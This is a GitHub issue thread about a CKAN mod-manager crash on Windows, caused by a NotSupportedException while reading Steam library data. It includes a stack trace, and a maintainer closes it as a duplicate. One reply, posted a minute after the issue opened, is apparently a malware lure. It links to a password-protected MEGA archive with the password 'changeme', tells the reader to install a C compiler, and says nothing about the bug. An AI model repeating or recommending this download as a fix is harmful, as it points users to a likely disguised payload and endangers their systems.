### ISSUE TITLE
[Bug]:Windows - Crash on Startup - Unhandled Exception: System.NotSupportedException: SteamGame

### ISSUE THREAD

**Issue by Ethan753** [KSP-CKAN/CKAN#4210] opened 2024-09-29 03:13 UTC
### Is there an existing issue for this?

- [X] I have checked the existing issues for an existing issue. I even actually looked at the ones that are pinned to the top!

### Operating System

Windows

### CKAN Version

v1.35.0

### Games

KSP 1

### Game Version

1.12.5 Latest, Just installed it before getting CKAN

### Did you make any manual changes to your game folder (i.e., not via CKAN)?

KSP is installed on the D: drive (dont have space on C: so its in D:\SteamLibrary\steamapps\common\Kerbal Space Program) 
Also put CKAN on D: 

### Describe the bug

Crash on startup, error is displayed for a second before closing itself
Unhandled Exception: System.NotSupportedException: SteamGame
     at ValveKeyValue.ObjectCopier.MakeObject[TObject])KVObject keyValueObject, IObjectReflector reflector)
     at CKAN.SteamLibrary.<>c__DisplayClass3_0.<LibraryPathGames>b__0(String acfFile)
     at System.Linq.Enumerable.WhereSelectEnumberableIterator'2.MoveNext()
     at System.Linq.Enumerable.<SelectManyIterator>d__17'2.MoveNext()
     at System.Linq.Enumerable.<ConcatIterator>d__59'1.MoveNext()
     at System.Linq.Buffer'1..ctor(IEnumerable'1 source)
     at System.Linq.Enumerable.ToArray[TSource](IEnumerable'1 source)
     at CKAN.SteamLibrary..ctor()
     at CKAN.GameInstanceManager..ctor(IUser user, IConfiguration configuration)
     at CKAN.CmdLine.MainClass.Execute(GameInstanceManager manager, CommonOptions opts, String[] args)
     at CKAN.CmdLine.MainCLass.Main(String[] args)
![Screenshot (800)](https://github.com/user-attachments/assets/f7ce5519-91de-48a1-be0d-4216a924fe59)

### Steps to reproduce

attemp to open/start, either by double clicking icon or via command line

### Relevant log output

as states above
Thank you if you have any suggestions for me to look into! I am clueless on this, and I haven't found any other posts with a NotSupportedException issue

**Comment by SagarChandra07** [comment] 2024-09-29 03:14
download

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by HebaruSan** [comment] 2024-09-29 03:15
Duplicate of #4197

**Closed by HebaruSan** 2024-09-29 03:15 UTC
